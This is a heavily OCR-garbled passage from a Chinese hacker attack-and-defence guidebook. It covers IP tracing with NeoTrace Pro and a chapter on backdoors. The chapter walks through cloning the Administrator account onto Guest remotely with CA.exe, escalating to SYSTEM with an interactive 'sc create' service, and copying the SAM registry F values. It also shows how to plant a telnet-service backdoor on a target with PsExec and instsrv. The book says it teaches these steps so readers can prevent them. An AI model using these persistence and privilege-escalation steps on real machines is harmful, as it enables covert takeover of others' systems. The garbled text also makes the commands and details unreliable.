入 “命令 提示 符 ” 窗 口 。 

2) 在 当前 命令 提示 符 下 输入 “net use \ 192.168.0.55 "wuser:"Administrator"” 命 令 ， 即 
可 建立 容 连 接 。 稍 等 片刻 ， 束 会 显示 “命令 执行 成 功 ” 的 信息 。 

随 看 网 络 应 用 技术 的 发 展 ， 目 前 黑客 常常 利用 专门 的 奶 踪 工具 来 人 退 躁 和 攻击 远程 计算 
机 。 在 本 市 将 曝光 儿 球 音 见 的 黑客 退 踪 工具 。 














10.2 常见 的 黑客 退路 工具 


10;2.1 实战 下 追踪 技术 


在 网 络 管理 中 常常 需要 追踪 黑客 或 者 是 其 他 不 怀 好 意 的 网 民 的 行踪 , 那么 如 何 才能 
精确 地 定位 某 个 IP 地 址 的 所 在 地 ? 实际 上 ， 使 用 一 些 简单 的 命令 和 方法 就 可 以 实现 黑 
客 追 踪 。 

要 实现 网 络 定位 ， 最 简单 的 方法 就 是 在 IP 地 址 查询 网 站 上 进行 查询 ， 下 面 随便 选择 一 
个 网 站 为 例 介绍 具体 的 操作 步骤 。 
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Ea 

里 安 

: 攻防 从 入 门 到 精通 

靳 会 人 电导 性 

STEP01: 打开 一 个 IP 地址 查询 网 站 STEP02: 查找 已 知 的 IP 地址 


@r-o 


手机 、 电 话 号 码 数据 库 。 二 维 码 生成 
202.168.0.1 ED 


查询 的 IP : 292.168.9.1 来 自 : 澳大利亚 
GeolP: Australia 








REp) ” 安 人 9 ” 工具 O)- 名" 多 凡 习 口内 以 加 日 








二 an 


EE Fn tnese -sanz 
ED 


当前 IP ; 111.194.131.77 来 自 ; 北京 市 联通 
Geolp: Beijing. China 





TPG Intemet Pty Lid. 


美和 去 主机 打造 新 标准 本 


英和 了 人 和 新 二 机 和 弹性 
扩展 ， 在 线 管理 ， 仅 需 69 元 








UPTO -60% + WONLDWIDE SHIPPING 


打开 http://Wwww.ip.cn 网 站 。 输入 要 查找 的 I|P 地 址 ， 单 击 “ 查 询 ” 按 钮 ， 即 可 得 
到 需要 的 地 址 。 


10.2.2 ”NeroTrace Pr0 追踪 工具 的 使 用 


NeoTrace Pro v3.25( 网 络 追 踪 器 〉 是 一 款 网 络 路 由 追踪 软件 ， 用 户 只 需 输 入 远程 计算 
机 的 E-Mail 地 址 、IP 地 址 或 超 链接 URL 地 址 等 ， 其 软件 就 会 自动 显示 介 于 本 机 计算 机 与 
tal 点 与 相关 的 登记 信息 。 
装 和 使 用 NeroTrace Pro 人 志 踪 工具 的 具体 操作 步 又 如 下 。 


STEP01: ”下载 并 安装 NeoTrace Pro 








Ce 
File Edit View Help 
Target 了 ] 安 Go | 图 Node View 7| Info pane 


双击 NeoTracePro 图 标 图 , 即 可 
ceN 打开 “NeoTrace” 主 窗口 。 


人 ETCtw> 


Profession 


Neolrace 
re hr More Today 











STEP02: 开始 追踪 


部 NeoTrace: www.google.com we a & [oe 


和 ee ie ee ee ee -图 在 Target 文本 框 中 输入 想 
i | | 要 追踪 的 网 址 (www.googlecom)， 
单 击 右 侧 的 “Go” 按 钮 ， 进 入 追 
踪 状 态 。 














扫描 完毕 后 ， 在 “NeoTrace” 
主 窗口 中 查看 该 网 站 的 节点 和 摘 
要 信息 。 


单 击 “Save” 按 钮 。 





| 
| Pummay | Rogistont | Nekwork | Timing 























es 
网 络 代理 与 退 踊 技术 


STEP03: 保存 追踪 到 的 信息 STEP04: 双击 已 存储 的 文本 文档 


[3 Save Trace or Maep Image 





ee Wl 
| 大 SECUEC 用 

| 
回 > ?| 


当前 信息 .bt 
re ne yr- 三 所 TRIAL es Results 
+t; www. g008 
De 2014/9/15 Ee 16:55:58 


没有 与 搜索 条 件 匹 配 的 项 。 Nodes: 14 


| Node Dat 


Location 


问 问 右 记 请 PP 


a 


1 173.194.127. 177 Unknom hkg03s14-in-fl7.1e100. net 





Packet Data 
Node High Low Avg Tot Lost 
二 0 0 0 0 


2 i 1 MY 1 0 

















输入 文 作 名 并 单机 “保存 ”按钮 ， 可 将 当前 追踪 到 
的 信息 以 文本 文档 的 形式 保存 。 


STEP05: 返回 “NeoTrace” 主 窗口 











| | room 了 ] @Go 图 Map View [nfo Pone | 器 soe 呜 copy 吕 print | @ Ping 涛 Options 图 Online Help 网 


二 记忆 | External Apps 阅 
‘previous | Node 14 of 14 v | ”Next 


查看 该 网 站 的 网 络 
信息 。 


单 击 “Network” 


标签 。 


























各 所 | External Apps 
4previous | Node 14 of14 “Ne 






单 击 “Timing 标签 。 


查看 该 网 站 的 各 种 响 
应 时 间 以 及 发 送 与 丢失 的 
数据 包 等 信息 。 
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EE 当 
#1 黑 
靳 


ee | 
全- 攻防 从 入 门 到 精通 
全 人 人 他 


STEP07: 查看 Google 网 站 对 应 的 各 个 节点 


鲜 NeoTrace: www.google.com x 

low Editen Vi hiel i yy 

TIE 3 oo vee ve wwe | gw on rine omo [oz] one wo 加 单 击 “Map View” 下 
: i 拉 按 钮 ; 在 弹出 菜单 中 选 


141194.721 ~ 23487. tas ees st da ss 人 。 J 和、 
择 “Node View” 选 项 。 


Resfonse Time: 31 ms Last Response Tinle: 213 ms 
~ ee 


111.194.72.1 61.51.246.125 
| Response Time: 19 ms Response Time:7 ms 




















Highest Response|Time: 213 ms 
Lowest Response Time: 213 ms 
ResponselTime: 213 ms 


Total Number of Packets Sent 1 


124.65.194.101 查看 Google 网 站 对 应 
Response 6 54 st Resfonse Time: 10 ms 


| SR SEE 占 
| A A 的 各 | 已 AAAO 
219.158.97.38 219.158.100.158 
Response Time: 52 ms Response Time: 52 ms 


SR 2 单 击 "Options 按钮 。 
Response Time: 219 RN Ce Time: 220 SS 


ee: > a ®@, 


209.85.248.62 hkg03s14-in-f17.1e100.net 
Response Time: 255 ms Response Time: 213 ms 
WWW.Q00gle. CorT | Summary | Regstent] Network_ Timing | 
| Version 3.25 - TRIAL 攻 = - 


























STEP08: 打开 “Options” 对 话 框 
前 Options 二 | 





Fineinge Speed Indicators | Fonts 
General | Nap | List and Hode 





Workspace Settings 
Jw Text labels on toolbar Iw Trace sound 


Jw Check for new wersions [¥ Ping sound 
[ Load NeoTrace Today [w Show startup screen 


Location Determination 


fw Use Network Infoto aid in determining location 对 工作 区 、 地 理 位 置 、 组 冲 、 地 图 、 列 表 和 节点 、 
[Use DNS LOC to aid in determining location 和 ee 
速度 指示 器 以 及 字体 等 属性 进行 设置 。 


Hackeryatch ID Settings | Clear Trace History | 





Cache 


DNS cache expires alfter: [30 days Clear DNS | 
‘WHDOIS cache expires after: [30 daws Clear wsHDI5 | 


Location cache expires after: [80 days Clear Location | 
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黑客 攻击 目标 主机 主要 是 为 了 获取 系统 账户 名 称 和 登录 密码 ， 从 而 以 系统 
管理 员 的 身份 控制 目标 主机 系统 。 本 章 介绍 了 墨客 攻防 中 各 种 获取 和 保护 账户 
和 密码 的 方法 以 及 系统 服务 后 门 的 创建 方法 。 


O 后 门 的 分 类 

〇 使 用 软件 克隆 账号 及 手动 克隆 账号 曝光 

〇 O 使 用 Instsrv 和 Srvinstw 创建 系统 服务 后 门 曝光 
O 检测 系统 中 的 后 门 程序 





于 
取 > 


Py 
全- 攻防 从 入 门 到 精通 


新 二 = 


十 


人 





11.1 认识 后 门 


在 控制 一 合 服务 器 后 给 其 安 猴 一 个 或 多 个 后 门 ， 可 实现 对 该 服务 亏 进 行 长 期 控制 。 例 
如 ， 黑 客 可 能 使 用 密码 破解 一 个 或 多 个 账 亏 密码， 可 能 会 建立 一 个 或 多 个 账号 。 

墨客 可 能 使 用 一 些 技术 或 利用 系统 的 东 个 漏洞 来 握 升 权限 可 能 ， 会 对 系统 的 配置 文件 
进行 小 部 分 的 修改 ， 以 降低 系统 的 防卫 性 能 ， 也 可 能 会 安 猴 一 个 木马 程序 ， 使 系统 打开 一 
个 安全 漏洞 ， 以 利于 黑客 完全 掌握 系统 。 




















111.1 后 门 的 发 展 历史 


任何 事物 都 是 不 断 发 展 的 ， 后 门 也 不 例外 ， 后 门 的 发 展 主要 体现 在 如 下 两 个 方面 。 

1. 功能 上 的 发 展 

最 原始 的 后 门 只 有 一 个 cmdshell 功能 ， 随 看 黑客 对 后 门 的 要 求 不 断 提 高 ， 其 功能 也 逐 
渐 强 大 起 来 .winshell 后门 在 增加 了 增加 很 多 实用 功能 , 如 列举 进程 、 结 束 进程 等 ,在 winshell 
之 后 的 后 门 在 功能 上 已 经 是 趋 于 完善 ， 拥 有 开局 远程 终端 、 克 隆 用 户 等 功能 ， 甚 至 有 些 后 
门 还 上 共有 蔡 换 加 和 面 的 功能 。 

2. 隐 贡 性 上 的 发 展 

在 后 门 功能 发 展 的 同时 ， 澡 客 还 需要 考虑 其 生存 能 力 。 如 果 一 个 后 门生 存 能 力 个 强 ， 
很 容易 吏 被 管理 员 发 现 ， 拥 有 多 强大 的 功能 也 没 用 ， 所 以 后 门 的 隐蔽 性 非常 重要 。 后 门 程 
序 的 隐蔽 性 主要 体现 在 目 司 动 、 连 接 、 进 程 等 方面 。 

(1) 目 局 动 的 隐 涪 性 

在 目 局 动 方面 ， 最 初 是 利用 注册 表 中 的 RUN 项 来 实现 的 , 但 这 种 局 动 方法 在 “系统 配 
置 实用 程序 ”中 会 很 容易 被 发 现 ， 而 且 在 没有 用 户 登 录 的 情况 下 是 不 会 局 动 的 。 随 后 又 出 
现 服 务 局 动 ， 在 用 户 没有 登录 的 情况 下 也 可 以 启动 ， 这 样 隐蔽 性 束 提 高 了 。 现 在 又 相继 出 
现 ActiveX 局 动 、SVChost.exe 加 载 局 动 以 及 感染 系统 文件 启动 ， 还 有 API HOOK 技术 ， 可 
以 实现 在 用 户 模式 下 无 进程 、 无 启动 项 、 无 文件 启动 。 

(2) 连接 上 的 隐 菩 性 

在 连接 上 ， 最 初 是 正 同 连接 后 门 。 后 门 监听 一 个 端口 ， 远 程 计 算 机 对 其 进行 连接 。 只 
要 和 奉 看 端口 和 程序 的 对 应 关系 驶 可 以 很 容易 发 现 后 门 ， 所 以 这 样 的 后 门 的 隐 菩 性 是 非常 弱 
的 。 在 这 种 情况 下 ， 反 问 连 接 后 门 应 运 而 生 了 ， 这 类 后 门 可 以 突破 一 些 防火 墙 。 

(3) 进程 上 的 隐 责 性 

当 过 到 对 进程 进行 过 滤 的 防火 墙 时 ， 有 反问 连接 后 门 需 要 用 到 远程 线程 技术 。 在 进程 方 
血 应 用 最 多 的 是 远程 线程 搁 术 ， 先 把 后 门 写成 一 个 DLL 文件 ， 通过 远程 线程 函数 注入 其 他 
进程 ， 从 而 实现 无 进程 。 所 以 ,通过 远程 插入 线程 可 突破 对 进程 进行 过 滤 的 防火 墙 。 男 外 ， 
还 有 其 他 隐藏 方 法 ， 如 利用 原始 套 接 字 的 别 控 后门 等 。 





































































































lf.2 后 门 的 分 类 
后 门 可 以 按照 很 多 方式 来 分 类 ,为 了 便于 理解 ， 这 里 从 技术 方面 将 后 门 分 为 如 下 几 种 。 
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< 第 11 章 
后 门 技术 


(1) 网 页 后 门 

此 类 后 门 程序 一 般 都 是 通过 服务 右上 正常 的 Web 服务 来 构造 目 己 的 连接 方式 ， 如 现在 
非常 流行 的 ASP、CGI 脚本 后 门 等 。 现 在 国内 入 侵 的 主流 趋势 是 先 利 用 某 种 脚本 漏洞 上 传 
脚本 后 门 ， 浏 览 服务 器 内 安 逆 和 程序 ， 找 到 提升 权限 的 突破 口 ， 进 而 获得 服务 堪 的 系 
统 权限 。 

(2) 线程 插入 后 门 

这 种 后 门 在 运行 时 没有 进程 ， 所 有 网 络 操作 均 在 其 他 应 用 程序 的 进程 中 完成 。 即 使 客 
户 问安 闭 的 防火 场 拥 有 “应 用 程序 访问 权限 ”的 功能 ， 也 不 能 对 这 样 的 后 门 进行 有 效 的 警 
告 和 拦截 。 

(3) 扩展 后 门 

扩展 后 门 束 是 将 非常 多 的 功能 集成 到 后 门 里 ， 让 后 门 本 和 映 束 可 以 实现 多 种 功能 ， 从 而 
方便 直接 控制 “肉鸡 ”或 服务 器 。 这 类 后 门 非常 受 初 学 者 的 喜爱 ， 通 利 集 成 了 文件 上 传 /下 
载 、 系 统 用 户 检测 、HTTP 访问 、 终 端 安 装 、 端 口 开 放 、 局 动 /停止 服务 等 功能 。 所 以 ， 其 
本 身 就 是 个 小 的 工具 包 ， 功 能 强大 。 

(4) C/S 后 门 

传统 的 木马 程序 常常 使 用 C/S 构架， 这样 的 构架 很 方便 控制 ， 也 在 一 定 程 度 上 避免 了 
“万 能 密码 ”和 情况 的 出 现 。 而 C/S 后 门 采 用 和 传统 的 木马 程序 类 似 的 控制 方法 ， 即 采用 “ 客 
尸 问 /服务 闹 ” 的 控制 方式 ， 通 过 菜 种 特定 的 访问 方式 米 局 动 后 门 进而 控制 服务 占 。 

($5) root kit 

很 多 人 都 认为 root kit 是 获得 系统 root 访问 权限 的 工具 ， 而 实际 上 是 黑客 用 来 隐蔽 上 自 
己 的 踩 迹 和 保留 root 访问 权限 的 工具 。 通 常 ， 攻 击 者 通过 远程 攻击 获得 root 访问 权限 ， 进 
入 系统 后 , 攻击 者 会 在 侵入 的 主机 中 安装 root kit, 再 通过 root kit 的 后 门 检查 系统 检查 是 否 
有 其 他 的 用 户 登 录 。 如 果 只 有 目 己 ， 攻 击 者 就 开始 看 手 清理 日 志 中 的 有 关 信 息 ; 如 果 存 在 
其 他 用 户 ， 则 通过 root kit 的 虽 探 器 获 得 其 他 系统 的 用 户 和 密码 ， 然后 利用 这 些 信息 侵入 其 
他 计算 机 。 


11.2 ”账号 后 门 技术 曝光 


账号 后 门 是 黑客 在 第 一 次 入 侵 成 功 后 ， 在 远程 主机 内 部 建立 的 一 个 备用 管理 员 账 扎 ， 
以 便 用 官 理 员 权 限 再 人 次 进入 该 系统 ， 而 这 个 账号 与 一 般 系 统管 理 员 账 写 相 比 ， 只 拥有 user 
组 的 权限 。 克隆 账号 束 是 把 系统 中 存在 的 菜 一 个 账号 , 设 年 为 拥有 系统 管理 员 权 限 的 账号 ， 
克隆 出 来 的 账号 无 法 用 “账号 管理 ”来 全 出 该 账号 的 真实 权限 。 因 此 ， 元 隆 账号 常 亿 入 侵 
者 作为 “后 门 账号 ”。 了 人 解 黑客 克隆 账号 的 手法 ， 才 能 做 好 预防 工作 。 



































































































































11.2.1 使 用 软件 元 隆 账号 曝光 


Internet 中 提供 了 大 量 克 隆 账号 的 专业 小 软件 。 其 中 以 小 榜 推 出 的 CA.exe 最 为 出 名 ， 
启动 该 软件 后 ， 只 和 需 使 用 简单 的 命令 便 可 完成 元 隆 操 作 。 

CA.exe 是 一 个 远程 元 隆 账号 工具 ， 其 命令 格式 为 “ca.exe \IP< 账 号 >< 鹤 公 >< 元 隆 账 
写 >< 完 人 码 >” 其 中 各 参数 的 含义 如 下 。 
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ST Pe > 


攻防 从 入 门 到 精通 
传导 性 性 


@ < 账号 >: 被 元 隆 的 账号 (拥有 管理 员 权限 )。 
< 密码 >:; 人 被 元 隆 账 号 的 密 代 。 

@ < 克隆 账 写 >: 克隆 的 账号 (该 账号 在 元 隆 前 必须 存在 )。 
< 密 个 >:; 议 置 克隆 账号 的 密码 。 


STEP01: 将 CA.exe 保存 在 根 目 录 下 方 STEP02: 单 击 “运行 ”命令 


淮 尖 [ 








加 
GO En Wh E) ， SR saIa 


pe i 4 
组 织 打开 “新建 文件 去 PEID 议 化 于 设备 和 打印 机 





中 1 王 
天 点 面 

型 最 近 访问 
PEID.rar 








闻 库 


下 载 CA.exe 后 将 其 解压 到 除 系统 分 区 外 的 其 他 分 区 国 单 击 桌面 左下 角 的 在 弹出 的 “开始 ”" 菜 
根 目录 下 ， 例 如 解压 到 E 盘 。 “开始 ”按钮 。 单 中 单 击 “ 运 行 ”命令 。 


STEP03: 输入 cmd 命令 


Windows 将 恨 据 您 所 本 入 的 写 称 ， 为 您 打开 相应 的 程序 . 
训 性 夹 、 训 恬 或 Internet 资源 。 


在 “打开 " 文本 框 中 输入 “cmd "。 


输入 完毕 后 单 击 “ 确 定 ”按钮 。 





STEP04: 查看 CA.exe 的 语法 功能 STEP05: 克隆 账号 


Glone Privillege of fdministrator to IUSR_UVUIO 


CWindows\system32\cmd.exe 
hnd Set IUSR_UICTIN Password to SetNewPass"’ 


和 Windows Ch: 中 bi.zogglj] he 
= 

E:\2cCa.exe 3 i168.59.128 dministrator i123 Guest 
G:\Jsers\wlohn>e: Pe 
De hy ee 2682- ne Com 


Shadow fdministrator,. by netaAeues 2002/04/28 


Written hy netkeves 2002,. dansnowB2i1icn.com Connect i192.168.59.128 --- -OK 


Get SID of Guest --- -OK 
Prepairing ---- 


Usage: SA \\IP ficcount Password Clonehccount ClonePassword 
Processing .... 
Clean Up ....ERROR 


Account: Username 《Own fdministrator Privilege> 
Password: Password of User 

Clonehccount : CloneUser’s ficcount Name 《Must flready 
GlonePassword: Set Password of Glonellser 


输入 “e:… 后 按 《Enter> 加 答 入 ca exe" 后 按 ”输入 “ca.exe \192.168.59.128 Administrator 123 
键 ， 切 换 至 E 盘 根 目 录 。 《Enter> 键 ， 查 看 其 。” Guest” 后 按 《Enter》 键 ， 即 完成 账号 的 复制 。 
语法 功能 。 


B= > 
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“Ca.exe \192.168.59.128 Administrator 123 Guest” 的 今 


© 


提示 


在 STEP0O5 中 ，“ca.exe \192.168.59.128 Administrator 123 Guest” 命 今 的 含 
义 是 指 将 目标 计算 机 中 密码 为 123 的 Administrator 账 户 权限 克隆 给 Guest 账户 ， 





即使 Guest 拥有 与 Administrator 一 样 的 管理 员 账 户 权 限 。 


11.2.2 手动 元 隆 账号 上 坚 交 





在 Windows 系统 中 ，SAM 是 用 于 管理 系统 用 户 账 户 的 数据 库 ， 它 保存 系统 中 所 有 账 
户 的 配置 文件 路 径 、 账 户 权 限 和 密码 等 。 而 SID 则 是 用 户 账户 的 唯一 身份 编号 ， 它 用 于 确 





定 当前 账户 是 人 否 属于 管理 员 账 户 。 








Windows 系统 注册 表 中 有 两 处 保存 了 用 户 账 户 的 SID: SAM\Domains\Account\Users 分 
支 下 的 子 键 名 和 该 子 键 子 项 的 值 。 登 录 Windows 系统 时 ， 读 取 的 信息 是 所 对 应 子 键 耻 子 
项 的 值 ， 而 查询 账户 信息 时 读 取 的 是 Users 分 文 下 的 子 键 名 ， 因 此 当 用 Administrator 子 键 
的 FE 子 项 缆 兰 其 他 账号 的 F 子 项 之 后 , 豆 造 成 了 账 扎 是 管理 员 权 限 但 得 询 状态 依旧 的 情况 ， 





从 而 达到 克隆 账号 的 目的 。 
STEP01: 新 建 记 事 本 


昌 附件 
辣 Windows 资源 管理 器 


计算 机 


控制 面板 


设 亩 和 打印 机 


EN EE 








单 击 “ 开 始 " 选择 “所 有 程序 ">“ 附 
按钮 。 件 "> “记事 本 ”命令 。 
STEP03: 保存 编辑 的 代码 


编辑 (E) ”格式 (D) ” 童 看 
新 建 ([N) Ctrl+N 
打开 (O)... Ctrl+O 
保存 (S$) Ctrl+S 


“cmd 用 start” = 


另存 为 (A).. 


页 面 设置 (U)... 
打印 (P).… 


退出 (0 


Ctrl+P 


在 菜单 栏 中 选择 “文件 ” >“ 保存 ”命令 。 














STEP02: 输入 提升 SYSTEM 权限 的 代码 


了 无 标题 - 记事 本 Fe 区 号 
文件 (站 ”编辑 (E) ”格式 (D) ”查看 (V) 帮助 (H) 


sc Create SysCND binPath= “cmd /KE start” 
type= Da type= interact 
sc start SvysCMD 





在 记事 本 中 输入 代码 ， 用 以 将 当前 用 户 权 限 提升 至 
SYSTEM 权 限 。 


STEP04: 设置 保存 位 置 和 文件 名 


设置 文本 文档 设置 文件 名 后 单 击 
的 保存 位 置 。 “保存 " 按钮 。 


25] 











取 RT Pe > 
源 攻防 从 入 门 到 精通 
全 人 人 他 


STEP05: 运行 批 处 理 文件 STEP06: 选择 “查看 消息 ” 


二 国 


网 络 QuickCHM 










此 计算 机 上 运行 的 程序 正在 尝试 显示 一 条 消息 
程序 可 能 需要 多 的 信息 到 权限 来 碗 成 任务 ， 
| - Mi hn 


jpP 
EL 


Ehren wd 


人 沪 稍 后 提醒 我 






(显示 程序 洋 细 信 息 (D) 








双击 刚 创建 的 Syscmd.bat 文 件 快捷 图 标 。 在 “交互 式 服务 检测 ” 对 话 框 中 先 先 择 “查看 消息 ” 


选项 。 
STEP07: 输入 regedit 命令 STEP08: 双击 管理 员 账 户 下 的 F 子 键 


Pr 3 
文件 (Fi ”编辑 (E) 查 春 (V) 收藏 夫 (A) 帮助 (H) 
日 - 调 计算 机 
由 -县 HKEY_CLASSES_ROOT 
由 -有 HKEY_CURRENT_USER 
下 -上 HKEY LOCAL MACHINE 
由 - 国 BCD00000000 
， 田 . 朋 HARDWARE 
日 - 国 SAM 
: | 日 - 则 SAM 
日 | Domains 
: -| Account 
Aliases 


"| 管理 员 ; CWindows\system32\cmd.exe 


Microsoft Windows [hh 6-1-?6998] 
= 


GE “Windows™ uvustemd22regedait 


“和 Groups 





i 白 Users 
，000001F4 





在 命令 提示 符 窗口 中 输入 “regedit" 命令 , 打开 注 “ 国 展开 000001F4 分 支 。 ” 国 在 窗口 右 侧 双击 
册 表 编辑 器 。 F 子 键 项 。 


更 改 SAM 的 权限 

如 果 无 法 在 HKEY LOCAL MACHTNR\SAM\SAM\Domains\Account、 Users 下 
无 法 找到 000001F4 键 值 ， 则 选中 HKEY LOCAL MACHTNE 下 的 SAM 选项 ，@ 
在 菜单 栏 中 选择 “编辑 ” >“ 权限” 命令， 弹出 “SAM 的 权限 ”对 话 框 ，@ 在 列表 
框 中 选中 SYSTEM 选项 ， 目 单 击 “ 确 定 ” 按 钮 即 可 更 改 SAM 的 权限 为 SYSTEM， 可 
查看 HKEY LOCAL MACHTNRSAM\SAM\Domains\Account\Users 下 的 000001F4 
和 000001F5 键 值 . 


好 注册 去 编 缉 器 加 SAM 的 权限 XxX| 


EE sev a 
— 去 全 | 


组 或 用 户 名 (6): 


复制 项 名 称 (C) 


章 找 (F)... Ctrl+F 
查找 下 一 个 (X) F3 





252 


< 第 1L 章 


后 门 技术 
STEP09: 复制 F 键 值 的 数值 数据 STEP10: 双击 来 宾 账户 下 的 F 子 键 


文件 ( ”编辑 (E) ” 童 看 (V) 收藏 夫 (A) ”帮助 (H) 
日 - 调 计算 机 

量 - | HKEY_LOCAL MACHINE 

: BCD00000000 





00 00 
3F 0D: i J 
0 Do bo oo 00 














9 CD 0 CE Ts 晶 HARDWARE 











nn Do on 日 - 且 SAM 
0 00 00 : | 日 - 且 SAM 
02 00 00 国 : 

nn 00 00 
nn no on 























-9 Domains 








日 -© Account 


| Aliases 








选中 数值 数据 ， 按 辆 单 击 “ 确 定 "按钮 。 展开 000001F5 分 支 。 在 窗口 右 侧 双 


《Ctrl+C> 组合 键 。 击 F 子 键 项 。 
STEP11: ”粘贴 F 键 值 的 数值 数据 STEP12: 返回 Windows 采 面 


交 日 式 服 务 检测 





返回 到 称 的 Windows 桌面 
如 时 程序 仍 于 要 注意 , 它 将 在 下 面 旦 示 自 己 的 窗口 ， 


当 您 完成 后 ， 或 者 如 果 您 亏 要 返回 到 您 的 亭 面 以 获取 详细 信 
息 ,现在 请 单 去 “返回 ”。 





选中 数值 数据 ， 按 国 单 击 “ 确 定 ” 在 “交互 式 服务 检测 ”对 话 框 中 单 击 “ 立 即 返 回 
《Ctrl+C>》 组 合 键 。 按钮 。 按钮 。 


ee Guest 账户 

当 黑 客 成 功 控 制 一 全 目标 计算 机 时 ， 便 可 利用 命令 实现 Guest 账户 的 启 
与 禁 当 输 入 “net user guest/active:n0” 了 时 ， 则 表示 禁用 Guest 账户 ; 、 入 
“net user guest/active:yes” 时 ， 则 表示 尼 用 Guest 账户 。 





STEP13: 输入 cmd 命令 STEP14: ”查看 Guest 账户 信息 





OO 
= 二 加 C\Windows\system32\cmd.exe 
= 3 
运行 icrosoft indows R; 76 
vb 打下 《c7 280089 Microsoft Corporation 7 


Z7 Windows 将 根据 您 所 边 入 的 名 称 , 为 您 打开 相应 的 程序 、 
文件 去 、 文 栏 或 Internet 资源 。 






11:868:083 


e9725 11:08:03 
Y € 


i ed 





按 《WIN+R > 键 ， 02| 单 击 “确定” 按钮。 输入 “net user guest” 命令 后 按 《Enter》 键 , 查看 
弹出 “运行 ”对 话 Guest 账 号 属性 , 发 现 该 账号 已 被 禁用 且 密 码 不 过 期 。 


框 ， 输 入 *cmd" 命令。 
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取 RD Fn 
新 音 


售 人 人 他 





11.3 


> 
攻防 从 入 门 ] 至 


系统 服务 后 门 技术 曝光 


I 精通 








系统 服务 后 门 技术 是 指 在 墨客 成 功 入 侵 目 标 计算 机 后 ,通过 修改 Windows 系统 中 的 服 











务 程序 来 制造 后 门 ， 以 便 日 后 成 功 登录 目标 计算 机 。 修 改 Windows 系统 中 的 服务 不 会 被 杀 
毒 软件 所 穴 觉 。 丁 帮助 了 解 黑客 创建 系统 服务 后 门 的 方式 ， 从 而 更 好 地 发 现 目 己 的 系统 


中 是 否 存 在 后 门 ， 做 好 防范 工作 。 


11.3.1 使 用 InstSty 创建 系统 服务 后 门 曝光 


Instsrv 是 一 款 可 以 上 自由 安装 / 翻 载 Windows 系统 服务 的 小 工具 , 它 具 有 目 由 指定 服务 名 


称 和 服务 所 执行 程序 的 功能 。 


STEP01: 准备 PsExec 和 instsrv 软件 


GSO"G ， 计算 机 新 加 卷 (E:) ， 


包含 关 库 中 Y 共享 


instsrv,exe 


新 建文 件 去 


组 织 > 


四 下 载 
贺 地面 
尖 最 近 访 问 


PsEXEc,EXEe 





司库 
下 载 PsExec 和 instsrv 后 ， 将 其 可 执行 文件 置 于 E 盘 
根 目录 下 。 


STEP03: 复制 tlntsvr 文件 


计算 机 ， 系统 保留 {C:] * Windows ， System32 


新 建文 件 去 


由 


急 TIMER.DRV 

| tintlgnt.Ime 

:| tlIntadmn.exe 
[=| tIntsess.exe 

(a tIntsvr.exe 

坊 | tlscsp.dl| 

久 TOOLHELP.DLL 


| 卢 Cs: NNO FE /IY SAD 
=| 是; tpm.msc 2009/6/11 543 


将 本 地 计算 机 的 tIntsvr.exe 文件 复制 到 目标 计算 机 
中 C:\Windows\System32 路 径 下 。 
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STEPO2: 








获取 远程 计算 机 的 命令 行 





吨 \ 改 192.168.59.128: cmd.exe 
Microsoft Windows [hh 本 6-1-269981] i 
[nb = 


C:\Jsers‘\v ohn»>e: 
[SD 1 \N292.168.593.128 Ee EH 4 
PsExec vi.98 一 Execute processes remotely 


HD 
Sysinternals 一 Www.sysinternals.com 


Microsoft Windows [hh 本 6.1.76961] ER 
版 梭 所 有 《Cc 2009 Microsoft Corporation, 怪 留 上 所有权 刊 |。 


:WUinaduowsNsystem32>> 





输入 "“e:" 后 按 《Enter> 键 , 接着 输入 获取 远程 计算 


机 命令 行 的 命令 。 
STEP04: 添加 Syshell 服务 


CoDpukIiodht “Ce 2001 一 2010 Mark Russinouich 
Susinteknals 一 www.sysinternals.com 


Microsoft Windows [h 本 6-1-?2699] 二 

hw PFT 有 ce 20H9 Microsoft GorLeoratisno TK 

CG: “Windows™\s vstem32>e: 

E:“>instsrv.exe Syshell CGC:\WINDOWS\s ystem32\tlntsvr.exe 


The service was successfuly added? 


Make sure that you go into the Gontrol Panel and use 
the Services applet to change the ficcount Name and 
Password that this newly installed service will use 


for its Security Context. 


:> 





输入 "e:”" 后 按 < Enter》 键 ,接着 输入 添加 Syshell 服 


务 的 命令 。 


< 第 11 章 
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STEP05: 输入 services.msc 命令 STEP06: 查看 添加 的 服务 


文件 (日 ”操作 (A) ”查看 (V) ”帮助 (H) 
负 思 | 状 | 国 加 是 | 回国 | ， 国 Il 二 


办 


名 称 撞 述 状态 
SPP Notification ,.。 捏 亿 软 件 授权 澈 .,， 
55 SSDP Discovery 








二 二 二 


3 Windows 将 根据 您 所 办 人 的 名 称 ,为 您 打开 相应 的 程序 、 
Ri 文件 实 、 文 档 或 Internet 资源 。 


services.msc 一 


总 | 使 用 管理 权限 创建 此 任务 。 





打开 (OO): 











打开 “运行 ”对 话 框 ， 单 击 “ 确 定 ” 在 窗口 中 可 看 见 Syshell 服 务 , 黑客 可 通过 该 服务 远 
输入 "services.msc”。 按钮 。 程 登 录 目 标 计算 机 。 


删除 Windows 系统 中 的 服务 
© 若 要 删除 Windows 系统 中 的 服务 , 则 可 以 使 用 sc 命令 来 实现 .打开 “ 命 
提示 邻 提 示 符 ”窗口 ,输入 “sc delete+ 服 务 名 称 ” 即 可 ,例如 输入 “sc delete Syshell 
后 ” 按 《Enter〉 键 ， 便 可 将 Syshell 服务 从 Windows 系统 中 删除 。 


管理 员 : C:\Windows\system32\cmd.exe 2 服务 
Microsoft Windows [hi 本 6-1-7699] | 文件 (站 ”操作 (A) ”可 看 (V) ”帮助 (H) 
版 权 所 有 《<c》 20989 Microsoft Corporation。 人 怀 留 名 名 | 国 | GB| 日 丽 | P BD 


去 服务 (本 地 ) 名 称 





C:\JUserkrs\John >sc delete 
[SC] DeleteService | 











11.3.2 ”使 用 $VinstW 创建 系统 服务 后 门 曝光 


仅仅 依靠 系统 目 市 的 工具 还 不 能 完全 实现 系统 服务 后 门 的 制作 ， 还 需要 借助 于 
Srvinstw 软件 的 帮助 。Srvinstw 软件 是 一 和 可 以 创建 和 添加 系统 服务 的 图 形 化 工具 。 

通过 Srvinstw 可 以 添加 程序 为 Windows 系统 服务 ， 从 而 实现 系统 服务 后 门 的 制作 ， 这 
里 以 PeerDistSvc 为 例 曝光 使 用 Srvinstw 创建 系统 服务 后 门 的 操作 方法 。 
STEP01: 启动 Srvinstw 程序 STEP02: 选择 移 除 服务 





泡 ) 安装 / 移 除 服务 (汉化 WinG). 


<1 | 计算 机 ， 新 加 卷 (E:) ， srvinstw 欢迎 使 用 本 软件 


组 织 打开 新建 文件 支 个 安装 服务 


滞 


R 











SRVINSTW.EXE 








